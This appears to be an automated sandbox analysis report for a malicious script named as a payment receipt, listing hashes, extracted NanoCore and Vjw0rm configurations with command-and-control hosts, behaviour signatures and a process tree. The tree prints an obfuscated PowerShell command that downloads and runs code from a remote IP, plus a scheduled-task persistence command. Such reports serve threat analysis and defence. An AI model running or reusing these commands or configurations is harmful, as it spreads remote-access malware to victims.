Analysis
-
max time kernel
161s -
max time network
165s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
28-10-2021 15:41
General
-
Target
h6d2_Payment_receipt.js
-
Size
81KB
-
MD5
ac46bea5b7fd09b1ab3da2b95cb03006
-
SHA1
e59702bca30c23aed49b4e24e6f1411c450ba8d2
-
SHA256
2b3792055f5035ac6e37c372853654eb1d2ec05425f217b339816b0aa12605a2
-
SHA512
601600fd54e840843d04ea97f5e04389933cff2c49e0bca97207a27fe95937f282a8c3fc35f2e684aeb0f073f049dcd9f74ecf25fd56c9c35109d82d7ca433e4
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://13.78.209.105/E/err.txt
Extracted
Family
nanocore
Version
1.2.2.0
C2
kenimaf.duckdns.org:8090
Mutex
543e7469-d950-4ec2-a110-de54f8d16167
Attributes
-
activate_away_mode
true
-
backup_connection_host
kenimaf.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-08-01T06:39:50.225932136Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
8090
-
default_group
kenn
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
543e7469-d950-4ec2-a110-de54f8d16167
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
kenimaf.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
Family
vjw0rm
C2
http://6200js.duckdns.org:6200
Signatures
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
-
Blocklisted process makes network request 3 IoCs
-
Drops startup file 2 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 14 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H ='http://13.78.209.105/E/err.txt';$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');&('I'+'EX')($HHHH -Join '')|&('I'+'EX');3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbsMD5
2b137d3d2ea7ddba63e99586f44e0388
SHA1d4634061943a78624880537ffa65472fc6195474
SHA2561af97b7b7febcf25481d8c653b141681be8a1cad29a563e9057c02c1c87b75c2
SHA5126a7240273576e625066b114960fa4063acd9404727d02bcd3183248f5c820161ec15fafe01858d22ddcf39cd4d03f8e52988625aabd7b01565339b8927693115
-
memory/920-115-0x0000000000000000-mapping.dmp
-
memory/1188-116-0x0000000000000000-mapping.dmp
-
memory/2860-177-0x0000000005BC0000-0x0000000005BC3000-memory.dmpFilesize
12KB
-
memory/2860-176-0x0000000005A90000-0x0000000005AA9000-memory.dmpFilesize
100KB
-
memory/2860-175-0x0000000005140000-0x0000000005145000-memory.dmpFilesize
20KB
-
memory/2860-174-0x0000000002840000-0x0000000002841000-memory.dmpFilesize
4KB
-
memory/2860-172-0x0000000004DF0000-0x0000000004DF1000-memory.dmpFilesize
4KB
-
memory/2860-171-0x0000000004EF0000-0x0000000004EF1000-memory.dmpFilesize
4KB
-
memory/2860-164-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2860-170-0x0000000004E50000-0x0000000004E51000-memory.dmpFilesize
4KB
-
memory/2860-169-0x0000000005350000-0x0000000005351000-memory.dmpFilesize
4KB
-
memory/2860-167-0x0000000000810000-0x0000000000848000-memory.dmpFilesize
224KB
-
memory/2860-165-0x000000000041E792-mapping.dmp
-
memory/3164-124-0x00000262C9FE0000-0x00000262C9FE1000-memory.dmpFilesize
4KB
-
memory/3164-166-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-131-0x00000262CA0C3000-0x00000262CA0C5000-memory.dmpFilesize
8KB
-
memory/3164-132-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-146-0x00000262CA0C6000-0x00000262CA0C8000-memory.dmpFilesize
8KB
-
memory/3164-147-0x00000262CA0C8000-0x00000262CA0C9000-memory.dmpFilesize
4KB
-
memory/3164-158-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-159-0x00000262CA040000-0x00000262CA064000-memory.dmpFilesize
144KB
-
memory/3164-160-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-129-0x00000262CC1A0000-0x00000262CC1A1000-memory.dmpFilesize
4KB
-
memory/3164-128-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-130-0x00000262CA0C0000-0x00000262CA0C2000-memory.dmpFilesize
8KB
-
memory/3164-127-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-126-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-125-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-123-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-122-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-173-0x00000262CA070000-0x00000262CA071000-memory.dmpFilesize
4KB
-
memory/3164-121-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-120-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-119-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-118-0x0000000000000000-mapping.dmp